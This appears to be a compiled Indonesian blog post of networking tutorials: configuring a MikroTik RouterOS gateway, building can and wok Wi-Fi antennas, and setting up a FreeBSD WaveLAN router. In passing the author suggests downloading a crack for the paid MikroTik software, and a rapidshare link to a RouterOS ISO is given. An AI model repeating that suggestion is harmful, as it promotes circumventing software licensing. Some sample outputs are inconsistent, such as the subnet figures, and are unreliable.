* NTP - Network Time Protocol server and client; synchronization with
GPS system

* Monitoring/Accounting - IP traffic accounting, firewall actions logging, statistics graphs accessible via HTTP

* SNMP - read-only access

* M3P - MikroTik Packet Packer Protocol for Wireless links and Ethernet

* MNDP - MikroTik Neighbor Discovery Protocol; also supports Cisco Discovery Protocol (CDP)

* Tools - ping; traceroute; bandwidth test; ping flood; telnet; SSH; packet sniffer; Dynamic DNS update tool

Layer 2 connectivity:

* Wireless - IEEE802.11a/b/g wireless client and access point (AP) modes; Nstreme and Nstreme2 proprietary protocols; Wireless Distribution System (WDS) support; virtual AP; 40 and 104 bit WEP; WPA pre-shared key authentication; access control list; authentication with RADIUS server; roaming (for wireless client); AP bridging

* Bridge - spanning tree protocol; multiple bridge interfaces; bridge firewalling, MAC

* VLAN - IEEE802.1q Virtual LAN support on Ethernet and wireless links; multiple VLANs; VLAN bridging

* Synchronous - V.35, V.24, E1/T1, X.21, DS3 (T3) media types; sync-PPP, Cisco HDLC, Frame Relay line protocols; ANSI-617d (ANDI or annex D) and Q933a (CCITT or annex A) Frame Relay LMI types

* Asynchronous - s*r*al PPP dial-in / dial-out; PAP, CHAP, MSCHAPv1 and MSCHAPv2 authentication protocols; RADIUS authentication and accounting; onboard s*r*al ports; modem pool with up to 128 ports; dial on demand

* ISDN - ISDN dial-in / dial-out; PAP, CHAP, MSCHAPv1 and MSCHAPv2 authentication protocols; RADIUS authentication and accounting; 128K bundle support; Cisco HDLC, x75i, x75ui, x75bui line protocols; dial on demand

* SDSL - Single-line DSL support; line termination and network termination modes

Instalasi dapat dilakukan pada Standard computer PC yang akan dijadikan router dan tidak memerlukan resource yang cukup besar untuk penggunaan standard, misalnya hanya sebagai gateway.

Berikut spec_minimal nya :

* CPU dan motherboard - bisa dgn P1 ~ P4, AMD, cyrix asal yang bukan multi-prosesor

* RAM - minimum 32 MiB, maximum 1 GiB; 64 MiB atau lebih sangat dianjurkan, kalau mau sekalian dibuat proxy , dianjurkan 1GB… perbandingannya, 15MB di memori ada 1GB di proxy..

* HDD minimal 128MB parallel ATA atau Compact Flash, tidak dianjurkan menggunakan UFD, SCSI, apa lagi S-ATA (mungkin nanti Ver. 3.0)

* NIC 10/100 atau 100/1000

Untuk keperluan beban yang besar ( network yang kompleks, routing yang rumit dll) disarankan untuk mempertimbangkan pemilihan resource PC yang memadai.

Lebih lengkap bisa dilihat di www.mikrotik.com. Meskipun demikian Mikrotik bukanlah free software, artinya kita harus membeli licensi terhadap segala fasiltas yang disediakan. Free trial hanya untuk 24 jam saja.

Kita bisa membeli software MikroTik dalam bentuk “licence” di CITRAWEB, UFOAKSES, PC24 (atau download cracknya, he he he …) yang diinstall pada HardDisk yang sebelumnya download/dibuat MikroTik RouterOS ISO kekeping CD atau disk on module (DOM). Jika kita membeli DOM tidak perlu install tetapi tinggal pasang DOM pada slot IDE PC kita.

Langkah-langkah berikut adalah dasar-dasar setup mikrotik yang dikonfigurasikan untuk jaringan
sederhana sebagai gateway server.

1. Langkah pertama adalah install Mikrotik RouterOS pada PC atau pasang DOM.

2. Login Pada Mikrotik Routers melalui console :

MikroTik v2.9.39

Login: admin

Password: (kosongkan)

Sampai langkah ini kita sudah bisa masuk pada mesin Mikrotik. User default adalah admin dan tanpa password, tinggal ketik admin kemudian tekan tombol enter.

3. Untuk keamanan ganti password default

[admin@Mikrotik] > password

old password: *****

new password: *****

retype new password: *****

[admin@ Mikrotik] >

4. Mengganti nama Mikrotik Router, pada langkah ini nama server akan kita ganti menjadi
“r-WLI” (bebas, disesuaikan dengan nama jaringan kita…)

[admin@Mikrotik] > system identity set name=r-WLI

[admin@r-WLI] >

5. Melihat interface pada Mikrotik Router

[admin@r-WLI] > interface print

Flags: X - disabled, D - dynamic, R - running

# NAME TYPE RX-RATE TX-RATE MTU

0 R ether1 ether 0 0 1500

1 R ether2 ether 0 0 1500

[admin@r-WLI] >

6. Memberikan IP address pada interface Mikrotik. Misalkan ether1 akan kita gunakan untuk koneksi ke Internet dengan IP 192.168.0.1 dan ether2 akan kita gunakan untuk network local kita dengan IP 172.16.0.1

[admin@r-WLI] > ip address add address=192.168.0.1 /

netmask=255.255.255.0 interface=ether1

[admin@r-WLI] > ip address add address=172.16.0.1 /

netmask=255.255.255.0 interface=ether2

7. Melihat konfigurasi IP address yang sudah kita berikan

[admin@r-WLI] >ip address print

Flags: X - disabled, I - invalid, D - dynamic

# ADDRESS NETWORK BROADCAST INTERFACE

0 192.168.0.1/24 192.168.0.0 192.168.0.63 ether1

1 172.16.0.1/24 172.16.0.0 172.16.0.255 ether2

[admin@r-WLI] >

8. Memberikan default Gateway, diasumsikan gateway untuk koneksi internet adalah 192.168.0.254

[admin@r-WLI] > /ip route add gateway=192.168.0.254

9. Melihat Tabel routing pada Mikrotik Routers

[admin@r-WLI] > ip route print

Flags: X - disabled, A - active, D - dynamic,

C - connect, S - static, r - rip, b - bgp, o - ospf

# DST-ADDRESS PREF-SRC G GATEWAY DISTANCE INTERFACE

0 ADC 172.16.0.0/24 172.16.0.1 ether2

1 ADC 192.168.0.0/26 192.168.0.1 ether1

2 A S 0.0.0.0/0 r 192.168.0.254 ether1

[admin@r-WLI] >

10. Tes Ping ke Gateway untuk memastikan konfigurasi sudah benar

[admin@r-WLI] > ping 192.168.0.254

192.168.0.254 64 byte ping: ttl=64 time

11. Setup DNS pada Mikrotik Routers

[admin@r-WLI] > ip dns set primary-dns=192.168.0.10 /

allow-remoterequests=no

[admin@r-WLI] > ip dns set secondary-dns=192.168.0.11 /

allow-remoterequests=no

12. Melihat konfigurasi DNS

[admin@r-WLI] ip dns> pr

primary-dns: 192.168.0.10

secondary-dns: 192.168.0.11

allow-remote-requests: no

cache-size: 2048KiB

cache-max-ttl: 1w

cache-used: 21KiB

[admin@r-WLI] ip dns>

13. Tes untuk akses domain, misalnya dengan ping nama domain

[admin@r-WLI] > ping yahoo.com

216.109.112.135 64 byte ping: ttl=48 time=250 ms
10 packets transmitted, 10 packets received, 0% packet loss
round-trip min/avg/max = 571/571.0/571 ms
[admin@r-WLI] >

Jika sudah berhasil reply berarti seting DNS sudah benar.

14. Setup Masquerading, Jika Mikrotik akan kita pergunakan sebagai gateway server maka agar client computer pada network dapat terkoneksi ke internet perlu kita masquerading.

[admin@r-WLI]> ip firewall nat add action=masquerade /

outinterface=ether1 chain:srcnat

[admin@r-WLI] >

15. Melihat konfigurasi Masquerading

[admin@r-WLI]ip firewall nat print

Flags: X - disabled, I - invalid, D - dynamic

0 chain=srcnat out-interface=ether1 action=masquerade

[admin@r-WLI] >

Setelah langkah ini bisa dilakukan pemeriksaan untuk koneksi dari jaringan local. Dan jika berhasil berarti kita sudah berhasil melakukan instalasi MikroTik Router sebagai Gateway server. Setelah terkoneksi dengan jaringan Mikrotik dapat dimanage menggunakan WinBox yang bisa didownload dari MikroTik.com atau dari server mikrotik kita.

Misal Ip address server mikrotik kita 192.168.0.1, via browser buka http://192.168.0.1 dan download WinBox dari situ.
Jika kita menginginkan client mendapatkan IP address secara otomatis maka perlu kita setup dhcp server pada Mikrotik. Berikut langkah-langkahnya :

1. Buat IP address pool
/ip pool add name=dhcp-pool ranges=172.16.0.10-172.16.0.20

2. Tambahkan DHCP Network dan gatewaynya yang akan didistribusikan ke client Pada contoh ini networknya adalah 172.16.0.0/24 dan gatewaynya 172.16.0.1
/ip dhcp-server network add address=172.16.0.0/24 gateway=172.16.0.1

3. Tambahkan DHCP Server ( pada contoh ini dhcp diterapkan pada interface ether2 )
/ip dhcp-server add interface=ether2 address-pool=dhcp-pool

4. Lihat status DHCP server

[admin@r-WLI] > ip dhcp-server pr

Flags: X - disabled, I - invalid

# NAME INTERFACE RELAY ADDRESS-POOL LEASE-TIME ADD-ARP

x dhcp1 ether2 dhcp_pool1 4w2d yes

[admin@r-WLI] >

Tanda X menyatakan bahwa DHCP server belum enable maka perlu dienablekan terlebih dahulu pada langkah 5.

5. Jangan Lupa dibuat enable dulu dhcp servernya
/ip dhcp-server enable 0

Kemudian cek kembali dhcp-server seperti langkah 4, jika tanda X sudah tidak ada berarti sudah aktif.

6. Tes Dari client

Run dari Comman Prompt

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\EsDat>ping www.yahoo.com

Pinging www.yahoo-ht3.akadns.net [69.147.114.210] with 32 bytes of data:

Reply from 124.158.129.5: bytes=32 time=34ms TTL=59
Reply from 124.158.129.5: bytes=32 time=24ms TTL=59
Reply from 124.158.129.5: bytes=32 time=41ms TTL=59
Reply from 124.158.129.5: bytes=32 time=29ms TTL=59

Ping statistics for 69.147.114.210:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 24ms, Maximum = 41ms, Average = 32ms

7. Untuk bandwith controller, bisa dengan sistem simple queue ataupun bisa dengan mangle

[admin@r-WLI] queue simple> add name=Komputer01 /

interface=ether2 target-address=172.16.0.1/24 max-limit=65536/131072

[admin@r-WLI] queue simple> add name=Komputer02 /

interface=ether2 target-address=172.16.0.2/24 max-limit=65536/131072

dan seterusnya…

lengkap nya ada disini
www.mikrotik.com/docs/ros/2.9/root/queue
linux-ip.net/articles/Traffic…/overview.html
luxik.cdi.cz/~devik/qos/htb
www.docum.org/docum.org/docs

Referensi
www.mikrotik.com
www.mikrotik.com/docs/ros/2.9
fajar.uii.net.id
Forum-IMATEKOM (UPI “YPTK”) Padang

bahan2 tambahan:

KAMUS BAHASA INGGRIS-INDONESIA

Salam ….

software
Code:

http://rapidshare.de/files/30739630/mikrotik.router.os.2.9.6.ISO

cara membuat antene kaleng

CARA PEMBUATAN ANTENA KALENG

1. Pertama, siapkan peralatan dan bahan-bahan. Mulai bor, penggaris, hingga kaleng bekas dengan profil dimensi yang sesuai. Dalam contoh yang diperagakan, digunakan kaleng bekas Quaker Outmeal. Kaleng ini setara dengan kaleng susu instan ukuran 400 gr, Twister Stick Snack, atau kaleng buah produk Cina.

Kemudian, kaleng dibersihkan dan diratakan mulutnya agar tidak melukai tangan. Pastikan kaleng sudah bersih dan kering sebelum masuk ke tahap berikutnya. 1

2. Dilanjutkan dengan pengukuran diameter dan tinggi kaleng. Masukkan ukurannya dalam rumus untuk menentukan titik wave guide dan penguatannya. Rumus bisa dilihat di situs pada akhir artikel ini.

Siapkan konektor N Female Panel Mount dan membuat wave guide sesuai hasil kalkulasi dimensi kaleng dan frekuensi yang telah diperoleh sebelumnya dari rumus.

3. Ukur lokasi dari dasar kaleng dan bor titik wave guide. Kemudian buat lubang baut dudukan konektor N Female Panel Mount.

Tahap berikutnya adalah perkabelan. Kupas inner tembaga kabel CNT/LMR-200 yang memiliki nilai resistansi 50 Ohm untuk wave guide. Lanjutkan dengan menyambung kabel inner Wave Guide ke konektor N Female Panel Mount.

Panjang kabel jumper adalah kelipatannya hasil yang diperolehdari rumus: berdasarkan rumus (3 x 108 (rambatan sinyal di udara)/frekuensi dalam khz) x 0,92 (koefisien kabel).

Sedangkan loss akibat kabel dihitung berdasar situs www.swisswireless.org/wlan_calc_en.html.

4. Pasang wave guide yang sudah tersolder di ke lubang di kaleng. Eratkan baut konektor ke kaleng. Jangan lupa untuk segera menutup dengan rubber silicon sebagai pelindung dari kebocoran air dan mencegah terjadinya karat pada konektor.

Bor dasar kaleng untuk memasang clamp mounting ke tower atau dudukan antena. Solusi lain, bisa juga menggunakan besi plat untuk stang kaleng. Intinya, kaleng bisa ditempelkan kuat ke tower atau tiang tanpa kesulitan. Tentu saja, wave guide tidak boleh bergeser atau bergerak ke titik yang lain.

5. Potong kabel RG-8 9913/CNT/LMR-400 yang memiliki nilai resistansi 50 Ohm untuk jumper dengan panjang kelipatan 11,5 cm. Perhatikan situs referensi untuk melihat rumus perhitungan cable balancing.

Pasangkan konektor N Male atau N Female ke jumper. Lalu lindungi sambungan konektor dengan rubber silicon.

Setelah terpasang kuat, baru masuk tahap finishing, yakni pemasangan tutup depan kaleng. Tutup depan ini perlu diperhatikan bahannya, tidak dari bahan metal. Jadi bisa plastik atau PVC. Kemudian semua celah diberi silicon gel, untuk penahan air. Lalu dimulailah pengecatan bodi kaleng sesuai selera.

6. Setelah terangkai semua dengan kuat dan enak dilihat, maka antena kaleng siap dipasang. Ada dua cara pemasangan antena kaleng ini. Keduanya tidak jauh berbeda dengan pemasangan antena wave LAN biasa. Kedua cara ini tergantung pada jenis perangkat radio yang digunakan.

Ada perangkat yang langsung ke komputer, ada juga yang membutuhkan router. Setelah terpasang, uji coba antena dengan teknik War Driving. Teknik ini menggunakan software Site Survey seperti Netstumbler.

LEBIH LANJUT
Sumber : http://antzon.wordpress.com/2006/02/28/wireless-kaleng-susu/

Contoh : http://www.turnpoint.net/wireless/cantennahowto.html

Dimensi kaleng: http://www.saunalahti.fi/elepal/antenna2calc.php

Panduan modifikasi: http://www.saunalahti.fi/elepal/antenna2.html

Tinggi wave guide: http://www.csgnetwork.com/antennawncalc.html

Detail teori:
- http://flakey.info/antenna/waveguide
- http://www.lincomatic.com/wireless/index.html

Software Netstumbler: http://www.netstumbler.com/downloads/

Software kalkulasi site survey: http://www.cplus.org/rmw/w/english1.html

Referensi lain: http://www.king.igs.net/~karc/projects/antenna.htm

http://www.turnpoint.net/wireless/cantennahowto.html
Gambar pendukung : http://www.te.ugm.ac.id/~josh/seminar/kaleng/page_0001.html

tool yangbermanfaat...


Tools yang sangat bermanfaat sebelum pemasangan Wireless LAN

Di milis dan Forum ..... masih banyak rekan2 yg bertanya sbb:

Perangkat Radio Wireless apa sih yang bagus (terbaik)?
Yang tidak melanggar aturan regulasi!
Silahkan tengok2

dBm to Watt Conversion Calculator
http://www.moonblinkwifi.com/dbm_to_watt_conversion.cfm

Sesuai peraturan yang berlaku itu Maximum 100mWatt = 20dBm

Selain masalah LOS (Line Of Sight), Berapa ketinggian Antenna yang ideal?
Ini tool buat menentukan ketinggian antenna yg tepat sesuai jarak antara ke 2 antenna.
Dan berlaku untuk implementasi Point to Point maupun Point to MultiPoint.

Fresnel Zone Clearance Calculator
http://www.ratrivertech.ca/archives/tools/Fresnel_Zone_Clearance_Calculator.htm
Fresnel Zone Calculator


Mau seberapa jauh kah? atau bisa seberapa jauh kah?
tool dari www.mikrotik.co.id

Tutorial Membuat Antena Wajan Bolic

Tutorial Membuat Antena Wajan Bolic

1. Alat dan bahan yang dibutuhkan untuk membuat Antena Wajan Bolic.

· Wajan berdiameter minimal 45 cm

· USB wirelles 11 MB + kabel

· Kaleng berdiameter 10 cm dengan tinggi 15 cm

· Sok drat luar dan dalam masing – masing (2 buah)

· Paralon 0,5” inch

· Bor

· Mur

· Gergaji besi


2. Langkah – langkah pembuatan Wajan Bolic

a. Lubangi wajan tepat ditengah sesuai dengan ukuran baut yang digunakan sebagai penyangga.



b. Potong paralon setinggi kaleng ditambah jarak dasar wajan ke kaleng setinggi 5 cm. Dan belah sebagian paralon sebagai penjebit USB Wirelles.


c. Potong sok drat luar sehingga berbentuk seperti gambar berikut.

d. Lubangi bagian dasar kaleng pas di tengah sesuai ukuran mur. Dan sekaligus lubangi bagian samping kaleng sesuai ukuran USB wireless untuk menghubugkan kabel USB ke USB

e. Pasang USB pada paralon yang telah di belah. Dan ikuti dengan memasang sok drat luar. Seperti gambar berikut.


f. Masukkan USB yang telah dipasang pada paralon tadi kedalam kaleng dan pasang kabel USB melaui lubang pada bagian samping kaleng.

g. pasang kaleng yang telah ada USB pada wajan

Installasi router

Teknik Instalasi Router WaveLAN 2-11Mbps di 2.4GHz
Pardila Wisman

Kebutuhan akan sambungan Internet berkecepatan tinggi yang handal semakin terasa saat ini. Kompetisi yang tajam diantara WARNET, Lembaga Pendidikan, Perkantoran membutuhkan solusi akses Internet berkecepatan tinggi. Modem telepon 33.6-56Kbps menjadi usang dalam kompetisi yang demikian tajam, akses Internet kecepatan 64Kbps, 128Kbps hingga 2-11Mbps menjadi dambaan banyak pengusaha WARNET. Sayang sekali infrastruktur Telkom yang ada sekarang ini tidak memadai untuk dipakai pada kecepatan tinggi hingga 2-11Mbps secara reliable dan murah. Paling murah harus membayar Rp. 10 juta / bulan ke Telkom untuk menyewa leased line 2Mbps. Peralatan WaveLAN buatan sendiri membutuhkan Rp. 20 juta-an se pasang (satu link), jadi hanya 2 bulan langganan ke Telkom sudah balik modal.

Berbagai solusi alternatif sambungan ke Internet telah di gunakan banyak orang mulai dari PC-modem dial-up, leased line via Telkom, VSAT semua mempunyai kendala (terutama biaya) pada akses Internet berkecepatan tinggi. Dengan mahalnya solusi kecepatan tinggi yang diberikan maka solusi wireless menjadi menarik karena ternyata memberikan solusi yang relatif murah untuk akses data kecepatan tinggi. Pada prinsip-nya ada dua (2) solusi utama, yaitu:

• Teknologi Satelit untuk jarak jauh – contohnya adalah MELESAT, PalapaNet & TurboNet yang paling murah & masih masuk ke kelas DirectPC.
• Teknologi CDMA / WaveLAN untuk jarak pendek 5-10 km.

Pada kesempatan ini kami akan membahas teknik menginstalasi router WaveLAN yang murah agar dapat mengkaitkan sebuah LAN ke jaringan Internet. Router WaveLAN built-up dapat dibeli dari beberapa perusahaan di Indonesia maupun langsung dari Amerika Serikat seharga sekitar US$3000-an per buahnya. Mahal sekali memang, oleh karena itu akal-akalan perlu kita lakukan untuk menekan harga supaya menjadi sangat murah sekitar Rp. 20-an juta sepasang (satu link). Rekan-rekan yang aktif mengusahakan router WaveLAN yang murah ini terutama di motori oleh aulia@wahid.com dan AI3-ITB (dedi@ai3.itb.ac.id).

Perlu di camkan disini bahwa ijin penggunaan frekuensi harus di mintakan ke DITJEN POSTEL, karena sampai saat ini belum dibebaskan penggunaan frekuensi di alokasi frekuensi data kecepatan tinggi ini untuk digunakan secara bebas. Adapun alokasi frekuensi yang perlu dimintakan ijin-nya adalah band 2.4GHz umumnya. Walaupun beberapa peralatan WaveLAN yang baru juga menggunakan band-band lain seperti 5.8GHz, 10GHz maupun 915MHz (yang dilarang digunakan di Indonesia). Biaya sewa frekuensi-nya harus di check ke http://www.postel.go.id - tapi rasanya sekitar Rp. 2 juta / tahun (masih lebih murah daripada berlangganan Telkom).

Pada kesempatan ini penulis mencoba untuk memberi sedikit gambaran penyambungan Internet melalui radio WaveLAN (2.4GHz) dan teknik membuat router mengggunakan WaveLAN tsb.

Perlu diketahui bahwa ada beberapa jenis card WaveLAN yang banyak beredar di pasaran. Salah satu yang banyak beredar saat ini berbentuk PCMCIA seperti WavePOINT II yang biasanya digunakan dalam konfigurasi LAN bridge tanpa kabel. Dengan WavePOINT II orang di kantor dapat berjalan-jalan / mobile menggunakan laptop-nya tanpa perlu pusing dengan mencari colokan LAN. Dengan perangkat lunak yang sesuai maka card WaveLAN tsb bisa di aktifkan dengan baik. Pada gambar tampak card WavePOINT II PCMCIA yang dimaksud.

Jenis lain yang saat ini banyak digunakan untuk sambungan dedikated antar Warnet maupun lembaga pendidikan ke Internet adalah jenis gabungan antara card PCMCIA dengan dudukan untuk ke bus ISA di motherboard PC. Jenis ini yang banyak digunakan di ITB untuk menyambungkan berbagai universitas / instansi ke Internet.

Gambaran umum topologi penyambungan dua buah LAN melalui perangkat WaveLAN ini dapat dilihat pada gambar. WaveLAN berfungsi sebagai saluran jarak jauh antara ke dua LAN yang akan di sambungkan tersebut. Jarak tempuh peralatan WaveLAN ini sekitar 5-10 km harus line-of-sight artinya tidak boleh ada halangan fisik diantara ke dua antenna WaveLAN tsb. Jika ada gedung atau gunung ya di jamin halal komunikasi tidak akan terjadi karena kita bekerja pada frekuensi 2.4GHz di Microwave band. Tampak pada gambar yang lain tumpukan antenna WaveLAN yang ada di atap salah gedung di ITB untuk menyambungkan ke banyak institusi di sekitarnya. Teknik mengarahkan antenna merupakan seni tersendiri apalagi pada jarak jauh 5-10 km yang kadang-kadang cukup sulit untuk melihat ujung lawan bicaranya. Hal lain yang perlu diperhatikan adalah peralatan arrester (anti petir) seperti tampak pada gambar HARUS dipasang antara Card WaveLAN dan antenna agar peralatan kita aman dari imbas maupun sambaran langsung dari Petir. Arrester adalah investasi yang menguntungkan dibandingkan memberikan mangsa card wavelan kita ke petir.
Instalasi router WaveLAN
WaveLAN di dukung oleh banyak sistem operasi seperti WindowsNT, FreeBSD & Linux untuk beroperasi sebagai router. Ada cukup banyak informasi di Internet yang memungkinkan kita menjalankan PC sebagai gateway / router wavelan. Yang perlu dilakukan adalah menginstall Linux / FreeBSD di komputer anda yang ingin dijadikan router, kemudian menginstall driver yang sesuai dengan card wavelan yang kita gunakan untuk sambungan ke Internet. Saya yakin bahasa Inggris bukan masalah bagi sebagian besar pembaca maka beberapa situs di Internet yang membawa informasi tentang WaveLAN ini antara lain adalah:

• http://www.hpl.hp.com/personal/Jean_Tourrilhes/Linux/Linux.Wireless.Overview.html - yang berisi tutorial & overview tentang teknologi wireless Internet di Linux.
• http://www.fasta.fh-dortmund.de/users/andy/wvlan/ - Web milik andy yang berisi perangkat lunak driver WaveLAN untuk di Linux untuk kernel versi 2.3.x.
• Halaman Web milik Jean Tourrilhes yang berisi tentang Linux & Wireless LAN pada http://www.hpl.hp.com/personal/Jean_Tourrilhes/Linux/. Anda hampir dapat dipasti akan menemukan banyak sekali informasi tentang Linux & WaveLAN di sini.
• Kumpulan driver PCMCIA di Linux yang dikumpulkan oleh David Hind pada http://pcmcia.sourceforge.org/.
• Informasi yang sangat baik tentang WaveLAN/IEE di Linux oleh Harald Roelle di http://www.roelle.com/wvlanPPC/.
• Web milik Justin Seger yang memelihara WaveLAN/PCMCIA driver di http://www.media.mit.edu/~jseger/wavelan.html

Beberapa Frequently Asked Questions (FAQ) & file HOWTO yang mungkin akan membantu kita dapat mengembangkan WaveLAN menggunakan Linux dapat dilihat di:

• http://linux.grmbl.be/wlan/ - merupakan FAQ yang dimaintain oleh Dries Buytaert.
• http://www.rage.net/wireless/wireless-howto.html - merupakan keterangan cara menggunakan WaveLAN di Linux.
• http://www.qsl.net/n9zia/ - menjelaskan cara mengkaitkan jaringan dari rumah ke rumah menggunakan WaveLAN.

Pada kesempatan ini kami ingin menjelaskan pengalaman kami di ITB dalam menginstalasi banyak router WaveLAN menggunakan FreeBSD dengan konfigurasi minimal komputer PC 486, RAM 8Mbyte dan harddisk paling sedikit 200Mbyte. Selanjutkan akan di terangkan setup kernel FreeBSD agar dapat mensupport card WaveLAN.
Instalasi FreeBSD untuk mendukung WaveLAN
Setelah PC router anda di install FreeBSD minimal versi 3.0 ke atas, masuklah sebagai root. FreeBSD versi 3.0 keatas akan mengenai WaveLAN dan di kenal sebagai device “wi”. Oleh karena itu kita perlu mengkonfigurasi kernel FreeBSD 3.0 ini agar mengenali device “wi” caranya adalah

# cd /sys/i386/conf

copykan konfigurasi GENERIC-nya ke WAVELAN agar konfigurasi GENERIC bisa di recover jika ada hal-hal yang lupa di kemudian hari.

# cp GENERIC WAVELAN

Mari kita edit file WAVELAN cari baris seperti dibawah ini “PCCARD (PCMCIA) support” – kemudian di hilangkan tanda pagar (#)-nya dan di tambahkan satu baris yaitu device wi0 at isa? port? net irq? seperti tampak di bawah ini.

# PCCARD (PCMCIA) support
controller card0
device pcic0 at card?
device pcic1 at card?
device wi0 at isa? port? net irq?


Kemudian cari baris PCCARD NIC drivers dan tutup semua device ze0 dan zp0 menggunakan tanpa pagar (#) seperti di bawah ini.

# PCCARD NIC drivers.
# ze and zp take over the pcic and cannot coexist with generic pccard
# support, nor the ed and ep drivers they replace.
#device ze0 at isa? port 0x300 net irq 10 iomem 0xd8000
#device zp0 at isa? port 0x300 net irq 10 iomem 0xd8000

Jangan lupa mengedit juga card-card yang lain seperti card ethernet / LAN card agar sesuai dengan setting port & IRQ yang digunakan.

Setelah semua beres di edit, kita mulai mengcompile kernel baru untuk router FreeBSD dengan perintah

# config WAVELAN
# cd ../../compile/WAVELAN

compile konfigurasi WAVELAN dengan perintah

# make depend && make && make install

Selanjutnya kita perlu meminum kopi & ngobrol sambil menunggu komputer menyelesaikan semua pekerjaan. Setelah selesai router WaveLAN FreeBSD yang baru kita reboot.
Konfigurasi Router
Setelah kernel dibuat dengan baik, maka selanjutnya kita perlu melakukan konfigurasi beberapa file terutama di /etc untuk mengkonfigurasi card WaveLAN pada router tsb. Kami sarankan juga untuk membaca buku-buku tentang TCP/IP untuk mengerti teknik-teknik routing di jaringan Internet. Buka file di directory /etc tsb

# cd /etc/defaults
# vi rc.conf

di sini kami contohkan menggunakan vi editor, tentunya boleh-boleh saja menggunakan ee atau pico dll. Aktifkan baris file yang menunjukan PC card seperti di bawah ini

pccard_enable="YES" # Set to YES if you want to configure PCCARD devices.
pccard_mem="OPEN" # If pccard_enable=YES, this is card memory address.
pccard_ifconfig="YES" # Specialized pccard ethernet configuration (or NO).

Aktifkan sarana untuk routing melalui PC FreeBSD router yang kita install dengan cara menset.

gateway_enable="YES" # Set to YES if this host will be a gateway.
router_enable="YES" # Set to YES to enable a routing daemon.
router="/usr/local/sbin/gated" # Name of routing daemon to use.
router_flags="" # Flags for routing daemon.

Kembali ke direktori /etc. Selanjutnya kita perlu menset IP address card ethernet melalui perintah ifconfig dan routing melalui ethernet dll. yang ada dalam file /etc/rc.conf. Perlu diketahui bahwa file /etc/rc.conf berbeda dengan /etc/defaults/rc.conf, file /etc/rc.conf selain untuk menset IP address card Ethernet juga digunakan untuk menset sarana lainnya seperti mouse, routing, dll. Akan tetapi interface wavelan “wi0” tidak perlu di set di /etc/rc.conf karena setting device / interface wavelan “wi0” dilakukan pada file /etc/pccard.conf.defaults. Setelah selesai mengedit /etc/rc.conf. Copykan file pccard.conf.default menjadi pccard.conf dengan perintah

# cp pccard.conf.default pccard.conf

Masukan IP address card WaveLAN ke file /etc/pccard.conf, kemudian edit seperti dibawah ini

# $FreeBSD: src/etc/pccard.conf.sample,v 1.24.2.15 1999/11/16 17:48:38 roger Exp
$
# Generally available IO ports
io 0x240-0x360
# Generally available IRQs (Built-in sound-card owners remove 5)
irq 3 5 10 11 13 15
# Available memory slots
# Configurasi ini jangan di rubah,....!!!
# - Dedi -
#memory 0xd8000 96k
memory 0xd0000 96k

# Lucent WaveLAN/IEEE
card "Lucent Technologies" "WaveLAN/IEEE"
config 0x1 "wi0" 11
insert echo WaveLAN/IEEE inserted
insert /etc/pccard_ether wi0
insert /sbin/ifconfig wi0 167.205.207.58 netmask 255.255.255.248
insert /usr/local/sbin/gated
remove echo WaveLAN/IEEE removed
remove /sbin/ifconfig wi0 delete

Mencoba Operasi Card WaveLAN IEEE 802.11
Setelah setting pccard.conf selesai & PC router FreeBSD telah di reboot kembali, masukan PC Card WaveLAN IEEE 802.11 pada PC anda kemudian nyalakan PC tsb. Tinggal kita perhatikan available memory slots yang digunakan oleh PC card WaveLAN tsb. Jika sesuai maka FreeBSD akan langsung mengenali-nya dengan demikian maka anda selesai & sukses, apabila tidak dikenali maka coba di ganti setting pada pccard.conf entry

memory 0xd0000 96k

Yang tampaknya tidak cocok, di ganti dengan

memory 0xd8000 96k

Jangan lupa di sesuaikan IRQ agar sesuai dengan port IRQ pada card WaveLAN dan juga ROMBIOS port IRQ yang menunjukan card tersebut harus dibuka. Biasanya setelah kita compile kernel-nya tadi, FreeBSD akan mencari sendiri memory slot-nya.

Beberapa perintah dalam FreeBSD untuk mengedit setting pada card WaveLAN 802.11 ini adalah

# wicontrol
# pccardd (untuk mengaktifkan sebuah card waveLAN)

Untuk melihat parameter card WaveLAN, perintah wicontrol –I wi0 dapat kita gunakan dengan contoh dibawah ini

root:/data/login/dedi
wavelan-itb >> wicontrol -i wi0
NIC serial number: [ 98UT11330552 ]
Station name: [ FreeBSD WaveLAN/IEEE node ]
SSID for IBSS creation: [ FreeBSD IBSS ]
Current netname (SSID): [ FreeBSD IBSS ]
Desired netname (SSID): [ ANY ]
Current BSSID: [ 00:00:00:00:00:00 ]
Channel list: [ 2047 ]
IBSS channel: [ 3 ]
Current channel: [ 3 ]
Comms quality/signal/noise: [ 0 27 27 ]
Promiscuous mode: [ Off ]
Port type (1=BSS, 3=ad-hoc): [ 3 ]
MAC address: [ 00:60:1d:03:8d:eb ]
TX rate: [ 3 ]
RTS/CTS handshake threshold: [ 2347 ]
Create IBSS: [ Off ]
Access point density: [ 1 ]
Power Mgmt (1=on, 0=off): [ 0 ]
Max sleep time: [ 100 ]

Selamat mencoba